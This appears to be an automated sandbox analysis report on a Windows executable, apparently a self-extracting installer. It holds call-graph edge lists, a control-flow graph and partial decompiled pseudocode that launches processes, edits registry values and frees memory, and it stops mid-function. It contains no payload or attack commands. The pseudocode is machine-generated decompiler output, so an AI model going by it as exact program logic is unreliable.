2864->2866 2867 10d6ce0 4 API calls 2865->2867 2868 10d44b9 20 API calls 2866->2868 2869 10d2687 2867->2869 2868->2865 2869->2699 2869->2716 2871 10d696e GetDiskFreeSpaceA 2870->2871 2872 10d69a1 2870->2872 2871->2872 2873 10d6989 MulDiv 2871->2873 2872->2724 2873->2872 2875 10d59dd GetDiskFreeSpaceA 2874->2875 2876 10d59bb 2874->2876 2878 10d5ba1 memset 2875->2878 2879 10d5a21 MulDiv 2875->2879 2877 10d44b9 20 API calls 2876->2877 2882 10d59cc 2877->2882 2880 10d6285 GetLastError 2878->2880 2879->2878 2881 10d5a50 GetVolumeInformationA 2879->2881 2883 10d5bbc GetLastError FormatMessageA 2880->2883 2884 10d5a6e memset 2881->2884 2885 10d5ab5 SetCurrentDirectoryA 2881->2885 2886 10d6285 GetLastError 2882->2886 2887 10d5be3 2883->2887 2888 10d6285 GetLastError 2884->2888 2895 10d5acc 2885->2895 2889 10d59d1 2886->2889 2890 10d44b9 20 API calls 2887->2890 2891 10d5a89 GetLastError FormatMessageA 2888->2891 2899 10d5b94 2889->2899 2892 10d5bf5 SetCurrentDirectoryA 2890->2892 2891->2887 2892->2899 2893 10d6ce0 4 API calls 2894 10d5c11 2893->2894 2894->2699 2896 10d5b0a 2895->2896 2898 10d5b20 2895->2898 2897 10d44b9 20 API calls 2896->2897 2897->2889 2898->2899 2924 10d268b 2898->2924 2899->2893 2903 10d53bf 2901->2903 2902 10d171e _vsnprintf 2902->2903 2903->2902 2904 10d658a CharPrevA 2903->2904 2908 10d5415 GetTempFileNameA 2903->2908 2905 10d53fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 10d544f CreateDirectoryA 2905->2906 2907 10d543a 2906->2907 2906->2908 2910 10d6ce0 4 API calls 2907->2910 2908->2907 2909 10d5429 DeleteFileA CreateDirectoryA 2908->2909 2909->2907 2911 10d5449 2910->2911 2911->2849 2913 10d58d8 2912->2913 2913->2913 2914 10d58df LocalAlloc 2913->2914 2915 10d58f3 2914->2915 2917 10d5919 2914->2917 2916 10d44b9 20 API calls 2915->2916 2918 10d5906 2916->2918 2919 10d658a CharPrevA 2917->2919 2920 10d6285 GetLastError 2918->2920 2922 10d5534 2918->2922 2921 10d5931 CreateFileA LocalFree 2919->2921 2920->2922 2921->2918 2923 10d595b CloseHandle GetFileAttributesA 2921->2923 2922->2847 2922->2848 2923->2918 2925 10d26b9 2924->2925 2926 10d26e5 2924->2926 2927 10d171e _vsnprintf 2925->2927 2928 10d271f 2926->2928 2929 10d26ea 2926->2929 2930 10d26cc 2927->2930 2932 10d171e _vsnprintf 2928->2932 2940 10d26e3 2928->2940 2931 10d171e _vsnprintf 2929->2931 2934 10d44b9 20 API calls 2930->2934 2935 10d26fd 2931->2935 2936 10d2735 2932->2936 2933 10d6ce0 4 API calls 2937 10d276d 2933->2937 2934->2940 2938 10d44b9 20 API calls 2935->2938 2939 10d44b9 20 API calls 2936->2939 2937->2899 2938->2940 2939->2940 2940->2933 2942 10d468f 7 API calls 2941->2942 2943 10d4ff5 FindResourceA LoadResource LockResource 2942->2943 2944 10d515f 2943->2944 2945 10d5020 2943->2945 2944->2743 2946 10d5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2945->2946 2947 10d5057 2945->2947 2946->2947 2963 10d4efd 2947->2963 2950 10d507c 2953 10d5106 2950->2953 2954 10d50e8 2950->2954 2951 10d5060 2952 10d44b9 20 API calls 2951->2952 2958 10d5075 2952->2958 2956 10d511d 2953->2956 2957 10d5110 FreeResource 2953->2957 2955 10d44b9 20 API calls 2954->2955 2955->2958 2959 10d513a 2956->2959 2960 10d5129 2956->2960 2957->2956 2958->2953 2959->2944 2961 10d514c SendMessageA 2959->2961 2962 10d44b9 20 API calls 2960->2962 2961->2944 2962->2959 2964 10d4f4a 2963->2964 2965 10d4980 25 API calls 2964->2965 2970 10d4fa1 2964->2970 2968 10d4f67 2965->2968 2966 10d6ce0 4 API calls 2967 10d4fc6 2966->2967 2967->2950 2967->2951 2969 10d4b60 FindCloseChangeNotification 2968->2969 2968->2970 2969->2970 2970->2966 2972 10d255b 2971->2972 2973 10d2510 2971->2973 2975 10d6ce0 4 API calls 2972->2975 2974 10d658a CharPrevA 2973->2974 2976 10d2522 WritePrivateProfileStringA _lopen 2974->2976 2977 10d2569 2975->2977 2976->2972 2978 10d2548 _llseek _lclose 2976->2978 2977->2753 2978->2972 2980 10d1b25 2979->2980 3083 10d1a84 2980->3083 2982 10d1b57 2983 10d658a CharPrevA 2982->2983 2985 10d1b8c 2982->2985 2983->2985 2984 10d66c8 2 API calls 2986 10d1bd1 2984->2986 2985->2984 2987 10d1bd9 CompareStringA 2986->2987 2988 10d1d73 2986->2988 2987->2988 2989 10d1bf7 GetFileAttributesA 2987->2989 2990 10d66c8 2 API calls 2988->2990 2991 10d1c0d 2989->2991 2992 10d1d53 2989->2992 2993 10d1d7d 2990->2993 2991->2992 2998 10d1a84 2 API calls 2991->2998 2996 10d44b9 20 API calls 2992->2996 2994 10d1df8 LocalAlloc 2993->2994 2995 10d1d81 CompareStringA 2993->2995 2994->2992 2997 10d1e0b GetFileAttributesA 2994->2997 2995->2994 3004 10d1d9b 2995->3004 3017 10d1cc2 2996->3017 2999 10d1e1d 2997->2999 3000 10d1e45 2997->3000 3001 10d1c31 2998->3001 2999->3000 3089 10d2aac 3000->3089 3002 10d1c50 LocalAlloc 3001->3002 3007 10d1a84 2 API calls 3001->3007 3002->2992 3005 10d1c67 GetPrivateProfileIntA GetPrivateProfileStringA 3002->3005 3003 10d6ce0 4 API calls 3006 10d1ea1 3003->3006 3004->3004 3008 10d1dbe LocalAlloc 3004->3008 3011 10d1cf8 3005->3011 3005->3017 3006->2758 3007->3002 3008->2992 3013 10d1de1 3008->3013 3014 10d1d09 GetShortPathNameA 3011->3014 3015 10d1d23 3011->3015 3012 10d1e89 3012->3003 3016 10d171e _vsnprintf 3013->3016 3014->3015 3018 10d171e _vsnprintf 3015->3018 3016->3017 3017->3012 3018->3017 3020 10d209a 3019->3020 3021 10d2256 3019->3021 3023 10d171e _vsnprintf 3020->3023 3026 10d20dc 3020->3026 3022 10d6ce0 4 API calls 3021->3022 3024 10d2263 3022->3024 3025 10d20af RegQueryValueExA 3023->3025 3024->2758 3025->3020 3025->3026 3027 10d20fb GetSystemDirectoryA 3026->3027 3028 10d20e4 RegCloseKey 3026->3028 3029 10d658a CharPrevA 3027->3029 3028->3021 3030 10d211b LoadLibraryA 3029->3030 3031 10d212e GetProcAddress FreeLibrary 3030->3031 3032 10d2179 GetModuleFileNameA 3030->3032 3031->3032 3034 10d214e GetSystemDirectoryA 3031->3034 3033 10d21de RegCloseKey 3032->3033 3037 10d2177 3032->3037 3033->3021 3035 10d2165 3034->3035 3034->3037 3036 10d658a CharPrevA 3035->3036 3036->3037 3037->3037 3038 10d21b7 LocalAlloc 3037->3038 3039 10d21cd 3038->3039 3040 10d21ec 3038->3040 3041 10d44b9 20 API calls 3039->3041 3042 10d171e _vsnprintf 3040->3042 3041->3033 3043 10d2218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3021 3046 10d4016 CreateProcessA 3045->3046 3057 10d4106 3045->3057 3047 10d40c4 3046->3047 3048 10d4041 WaitForSingleObject GetExitCodeProcess 3046->3048 3050 10d6285 GetLastError 3047->3050 3051 10d4070 3048->3051 3049 10d6ce0 4 API calls 3052 10d4117 3049->3052 3053 10d40c9 GetLastError FormatMessageA 3050->3053 3116 10d411b 3051->3116 3052->2758 3055 10d44b9 20 API calls 3053->3055 3055->3057 3056 10d4096 CloseHandle CloseHandle 3056->3057 3058 10d40ba 3056->3058 3057->3049 3058->3057 3060 10d64c2 3059->3060 3061 10d658a CharPrevA 3060->3061 3062 10d64d8 GetFileAttributesA 3061->3062 3063 10d64ea 3062->3063 3064 10d6501 LoadLibraryA 3062->3064 3063->3064 3065 10d64ee LoadLibraryExA 3063->3065 3066 10d6508 3064->3066 3065->3066 3067 10d6ce0 4 API calls 3066->3067 3068 10d6513 3067->3068 3068->2791 3070 10d2289 RegOpenKeyExA 3069->3070 3071 10d2381 3069->3071 3070->3071 3073 10d22b1 RegQueryValueExA 3070->3073 3072 10d6ce0 4 API calls 3071->3072 3074 10d238c 3072->3074 3075 10d2374 RegCloseKey 3073->3075 3076 10d22e6 memset GetSystemDirectoryA 3073->3076 3074->2769 3075->3071 3077 10d230f 3076->3077 3078 10d2321 3076->3078 3079 10d658a CharPrevA 3077->3079 3080 10d171e _vsnprintf 3078->3080 3079->3078 3081 10d233f RegSetValueExA 3080->3081 3081->3075 3084 10d1a9a 3083->3084 3087 10d1aba 3084->3087 3088 10d1aaf 3084->3088 3102 10d667f 3084->3102 3086 10d667f 2 API calls 3086->3088 3087->2982 3088->3086 3088->3087 3090 10d2be6 3089->3090 3091 10d2ad4 GetModuleFileNameA 3089->3091 3092 10d6ce0 4 API calls 3090->3092 3093 10d2b02 3091->3093 3095 10d2bf5 3092->3095 3093->3090 3094 10d2af1 IsDBCSLeadByte 3093->3094 3096 10d2bca CharNextA 3093->3096 3097 10d2b11 CharNextA CharUpperA 3093->3097 3098 10d2bd3 CharNextA 3093->3098 3101 10d2b43 CharPrevA 3093->3101 3107 10d65e8 3093->3107 3094->3093 3095->3012 3096->3098 3097->3093 3099 10d2b8d CharUpperA 3097->3099 3098->3093 3099->3093 3101->3093 3103 10d6689 3102->3103 3104 10d66a5 3103->3104 3105 10d6648 IsDBCSLeadByte 3103->3105 3106 10d6697 CharNextA 3103->3106 3104->3084 3105->3103 3106->3103 3108 10d65f4 3107->3108 3108->3108 3109 10d65fb CharPrevA 3108->3109 3110 10d6611 CharPrevA 3109->3110 3111 10d660b 3110->3111 3112 10d661e 3110->3112 3111->3110 3111->3112 3113 10d663d 3112->3113 3114 10d6634 CharNextA 3112->3114 3115 10d6627 CharPrevA 3112->3115 3113->3093 3114->3113 3115->3113 3115->3114 3117 10d4132 3116->3117 3119 10d412a 3116->3119 3120 10d1ea7 3117->3120 3119->3056 3121 10d1ed3 3120->3121 3122 10d1eba 3120->3122 3121->3119 3123 10d256d 15 API calls 3122->3123 3123->3121 3125 10d2026 3124->3125 3126 10d1ff0 RegOpenKeyExA 3124->3126 3125->2479 3126->3125 3127 10d200f RegDeleteValueA RegCloseKey 3126->3127 3127->3125 3237 10d6a20 __getmainargs 3238 10d19e0 3239 10d1a24 GetDesktopWindow 3238->3239 3240 10d1a03 3238->3240 3241 10d43d0 11 API calls 3239->3241 3243 10d1a16 EndDialog 3240->3243 3244 10d1a20 3240->3244 3242 10d1a33 LoadStringA SetDlgItemTextA MessageBeep 3241->3242 3242->3244 3243->3244 3245 10d6ce0 4 API calls 3244->3245 3246 10d1a7e 3245->3246 3247 10d7270 _except_handler4_common 3248 10d69b0 3249 10d69b5 3248->3249 3257 10d6fbe GetModuleHandleW 3249->3257 3251 10d69c1 __set_app_type __p__fmode __p__commode 3252 10d69f9 3251->3252 3253 10d6a0e 3252->3253 3254 10d6a02 __setusermatherr 3252->3254 3259 10d71ef _controlfp 3253->3259 3254->3253 3256 10d6a13 3258 10d6fcf 3257->3258 3258->3251 3259->3256 3260 10d34f0 3261 10d3504 3260->3261 3262 10d35b8 3260->3262 3261->3262 3263 10d35be GetDesktopWindow 3261->3263 3264 10d351b 3261->3264 3265 10d3526 3262->3265 3269 10d3671 EndDialog 3262->3269 3266 10d43d0 11 API calls 3263->3266 3267 10d354f 3264->3267 3268 10d351f 3264->3268 3270 10d35d6 3266->3270 3267->3265 3272 10d3559 ResetEvent 3267->3272 3268->3265 3271 10d352d TerminateThread EndDialog 3268->3271 3269->3265 3273 10d361d SetWindowTextA CreateThread 3270->3273 3274 10d35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3270->3274 3271->3265 3275 10d44b9 20 API calls 3272->3275 3273->3265 3276 10d3646 3273->3276 3274->3273 3277 10d3581 3275->3277 3278 10d44b9 20 API calls 3276->3278 3279 10d359b SetEvent 3277->3279 3281 10d358a SetEvent 3277->3281 3278->3262 3280 10d3680 4 API calls 3279->3280 3280->3262 3281->3265 3282 10d6ef0 3283 10d6f2d 3282->3283 3285 10d6f02 3282->3285 3284 10d6f27 ?terminate@ 3284->3283 3285->3283 3285->3284

                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                            callgraph 0 Function_010D490C 1 Function_010D7208 2 Function_010D7000 3 Function_010D4200 4 Function_010D3100 95 Function_010D43D0 4->95 5 Function_010D6C03 26 Function_010D724D 5->26 6 Function_010D4702 58 Function_010D1680 6->58 84 Function_010D16B3 6->84 7 Function_010D2F1D 10 Function_010D621E 7->10 19 Function_010D3B26 7->19 22 Function_010D3A3F 7->22 34 Function_010D256D 7->34 36 Function_010D4169 7->36 37 Function_010D5164 7->37 53 Function_010D658A 7->53 54 Function_010D6285 7->54 76 Function_010D55A0 7->76 78 Function_010D3BA2 7->78 81 Function_010D44B9 7->81 105 Function_010D51E5 7->105 109 Function_010D6CE0 7->109 8 Function_010D681F 8->109 115 Function_010D66F9 8->115 9 Function_010D171E 44 Function_010D597D 10->44 10->54 10->81 10->109 11 Function_010D411B 72 Function_010D1EA7 11->72 12 Function_010D5C17 13 Function_010D6517 13->81 14 Function_010D3210 18 Function_010D4224 14->18 14->44 14->53 14->81 86 Function_010D58C8 14->86 14->95 15 Function_010D7010 16 Function_010D6E2A 117 Function_010D6CF0 16->117 17 Function_010D202A 17->9 17->53 17->81 17->109 18->58 18->81 19->13 63 Function_010D6298 19->63 107 Function_010D4FE0 19->107 20 Function_010D7120 21 Function_010D6A20 22->13 50 Function_010D468F 22->50 22->54 22->81 23 Function_010D6C3F 24 Function_010D4C37 25 Function_010D2630 25->81 25->109 27 Function_010D6648 28 Function_010D6F40 29 Function_010D7155 30 Function_010D6F54 30->1 30->26 31 Function_010D4A50 32 Function_010D3450 32->95 33 Function_010D6952 108 Function_010D24E0 34->108 35 Function_010D476D 35->13 69 Function_010D66AE 35->69 36->50 36->81 37->50 37->63 37->81 38 Function_010D5467 38->44 38->53 38->54 56 Function_010D1781 38->56 38->58 73 Function_010D53A1 38->73 38->86 38->109 39 Function_010D2267 39->9 39->53 39->109 40 Function_010D4B60 41 Function_010D6A60 41->1 41->23 41->26 41->29 42 Function_010D7060 41->42 116 Function_010D2BFB 41->116 42->15 42->20 43 Function_010D6760 52 Function_010D268B 44->52 44->54 44->81 44->109 45 Function_010D667F 45->27 46 Function_010D487A 46->0 47 Function_010D7270 48 Function_010D6C70 49 Function_010D2773 49->53 49->56 49->58 49->109 51 Function_010D2A89 52->9 52->81 52->109 53->84 55 Function_010D1A84 55->45 57 Function_010D4980 57->46 57->81 58->56 59 Function_010D3680 60 Function_010D6380 61 Function_010D5C9E 61->12 61->16 61->45 61->53 61->58 61->81 87 Function_010D66C8 61->87 61->109 110 Function_010D31E0 61->110 62 Function_010D4E99 62->58 63->9 63->109 64 Function_010D6495 64->53 64->56 64->109 65 Function_010D2390 65->53 65->58 65->65 65->84 65->109 66 Function_010D1F90 66->72 66->81 66->109 67 Function_010D6793 68 Function_010D2AAC 68->58 88 Function_010D17C8 68->88 103 Function_010D65E8 68->103 68->109 70 Function_010D2CAA 70->13 70->50 70->61 70->65 77 Function_010D18A3 70->77 70->81 99 Function_010D36EE 70->99 70->109 71 Function_010D6FA5 71->26 72->34 73->9 73->53 73->58 73->109 74 Function_010D6FA1 75 Function_010D4CA0 76->13 76->25 76->33 76->38 76->44 76->50 76->53 76->54 76->56 76->81 76->109 100 Function_010D17EE 77->100 77->109 78->17 78->39 78->50 78->54 78->56 78->64 78->81 96 Function_010D3FEF 78->96 101 Function_010D1AE8 78->101 78->109 79 Function_010D72A2 80 Function_010D6FBE 80->30 81->8 81->9 81->58 85 Function_010D67C9 81->85 81->109 82 Function_010D52B6 82->56 82->65 82->103 106 Function_010D1FE1 82->106 82->109 83 Function_010D69B0 83->2 83->48 83->80 97 Function_010D71EF 83->97 84->56 85->67 86->53 86->54 86->58 86->81 87->27 89 Function_010D4CC0 90 Function_010D4BC0 91 Function_010D30C0 92 Function_010D63C0 92->53 92->56 92->109 93 Function_010D4AD0 93->59 94 Function_010D4CD0 94->6 94->24 94->35 94->40 94->57 94->62 94->109 111 Function_010D47E0 94->111 95->109 96->11 96->54 96->81 96->109 98 Function_010D6BEF 99->8 99->51 99->81 99->85 102 Function_010D28E8 99->102 99->109 100->109 101->9 101->53 101->55 101->56 101->58 101->68 101->81 101->84 101->87 101->109 102->49 102->51 104 Function_010D70EB 105->50 105->54 105->81 107->50 107->81 113 Function_010D4EFD 107->113 108->53 108->109 109->117 111->58 111->81 112 Function_010D19E0 112->95 112->109 113->40 113->57 113->109 114 Function_010D70FE 116->7 116->66 116->70 116->82 118 Function_010D34F0 118->59 118->81 118->95 119 Function_010D6EF0

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 36 10d3ba2-10d3bd9 37 10d3bfd-10d3bff 36->37 38 10d3bdb-10d3bee call 10d468f 36->38 39 10d3c03-10d3c28 memset 37->39 45 10d3bf4-10d3bf7 38->45 46 10d3d13-10d3d30 call 10d44b9 38->46 41 10d3c2e-10d3c40 call 10d468f 39->41 42 10d3d35-10d3d48 call 10d1781 39->42 41->46 53 10d3c46-10d3c49 41->53 48 10d3d4d-10d3d52 42->48 45->37 45->46 58 10d3f4d 46->58 51 10d3d9e-10d3db6 call 10d1ae8 48->51 52 10d3d54-10d3d6c call 10d468f 48->52 51->58 69 10d3dbc-10d3dc2 51->69 52->46 65 10d3d6e-10d3d75 52->65 53->46 56 10d3c4f-10d3c56 53->56 61 10d3c58-10d3c5e 56->61 62 10d3c60-10d3c65 56->62 59 10d3f4f-10d3f63 call 10d6ce0 58->59 66 10d3c6e-10d3c73 61->66 67 10d3c75-10d3c7c 62->67 68 10d3c67-10d3c6d 62->68 71 10d3d7b-10d3d98 CompareStringA 65->71 72 10d3fda-10d3fe1 65->72 73 10d3c87-10d3c89 66->73 67->73 76 10d3c7e-10d3c82 67->76 68->66 74 10d3dc4-10d3dce 69->74 75 10d3de6-10d3de8 69->75 71->51 71->72 79 10d3fe8-10d3fea 72->79 80 10d3fe3 call 10d2267 72->80 73->48 82 10d3c8f-10d3c98 73->82 74->75 81 10d3dd0-10d3dd7 74->81 77 10d3dee-10d3df5 75->77 78 10d3f0b-10d3f15 call 10d3fef 75->78 76->73 83 10d3fab-10d3fd2 call 10d44b9 LocalFree 77->83 84 10d3dfb-10d3dfd 77->84 92 10d3f1a-10d3f1c 78->92 79->59 80->79 81->75 87 10d3dd9-10d3ddb 81->87 88 10d3c9a-10d3c9c 82->88 89 10d3cf1-10d3cf3 82->89 83->58 84->78 90 10d3e03-10d3e0a 84->90 87->77 93 10d3ddd-10d3de1 call 10d202a 87->93 95 10d3c9e-10d3ca3 88->95 96 10d3ca5-10d3ca7 88->96 89->51 91 10d3cf9-10d3d11 call 10d468f 89->91 90->78 99 10d3e10-10d3e19 call 10d6495 90->99 91->46 91->48 101 10d3f1e-10d3f2d LocalFree 92->101 102 10d3f46-10d3f47 LocalFree 92->102 93->75 97 10d3cb2-10d3cc5 call 10d468f 95->97 96->58 98 10d3cad 96->98 97->46 112 10d3cc7-10d3ce8 CompareStringA 97->112 98->97 113 10d3e1f-10d3e36 GetProcAddress 99->113 114 10d3f92-10d3fa9 call 10d44b9 99->114 108 10d3fd7-10d3fd9 101->108 109 10d3f33-10d3f3b 101->109 102->58 108->72 109->39 112->89 115 10d3cea-10d3ced 112->115 116 10d3e3c-10d3e80 113->116 117 10d3f64-10d3f76 call 10d44b9 FreeLibrary 113->117 126 10d3f7c-10d3f90 LocalFree call 10d6285 114->126 115->89 120 10d3e8b-10d3e94 116->120 121 10d3e82-10d3e87 116->121 117->126 124 10d3e9f-10d3ea2 120->124 125 10d3e96-10d3e9b 120->125 121->120 128 10d3ead-10d3eb6 124->128 129 10d3ea4-10d3ea9 124->129 125->124 126->58 131 10d3eb8-10d3ebd 128->131 132 10d3ec1-10d3ec3 128->132 129->128 131->132 133 10d3ece-10d3eec 132->133 134 10d3ec5-10d3eca 132->134 137 10d3eee-10d3ef3 133->137 138 10d3ef5-10d3efd 133->138 134->133 137->138 139 10d3eff-10d3f09 FreeLibrary 138->139 140 10d3f40 FreeLibrary 138->140 139->101 140->102
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E010D3BA2() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				short _v300;
                                                                                                                                                                                                                                            				intOrPtr _v304;
                                                                                                                                                                                                                                            				void _v348;
                                                                                                                                                                                                                                            				char _v352;
                                                                                                                                                                                                                                            				intOrPtr _v356;
                                                                                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                                                                                            				short _v364;
                                                                                                                                                                                                                                            				char* _v368;
                                                                                                                                                                                                                                            				intOrPtr _v372;
                                                                                                                                                                                                                                            				void* _v376;
                                                                                                                                                                                                                                            				intOrPtr _v380;
                                                                                                                                                                                                                                            				char _v384;
                                                                                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                                                                                            				intOrPtr _v392;
                                                                                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                                                                                            				void* _v408;
                                                                                                                                                                                                                                            				void* _v424;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                                                                                            				int _t112;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				signed char _t118;
                                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                            				void* _t130;
                                                                                                                                                                                                                                            				short _t137;
                                                                                                                                                                                                                                            				char* _t140;
                                                                                                                                                                                                                                            				signed char _t144;
                                                                                                                                                                                                                                            				signed char _t145;
                                                                                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                            				signed int _t157;
                                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                            				_t69 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                            				 *0x10d9124 =  *0x10d9124 & 0;
                                                                                                                                                                                                                                            				_t149 = 0;
                                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                                            				_t165 =  *0x10d8a28 - _t153; // 0x0
                                                                                                                                                                                                                                            				if(_t165 != 0) {
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t127 = 0;
                                                                                                                                                                                                                                            					_v392 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                            						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                            						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0x10d8c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E010D468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E010D1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E010D6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E010D3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0x10d8580;
                                                                                                                                                                                                                                            													if( *0x10d8580 != 0) {
                                                                                                                                                                                                                                            														E010D2267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0x10d8180;
                                                                                                                                                                                                                                            											if( *0x10d8180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E010D44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0x10d9124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
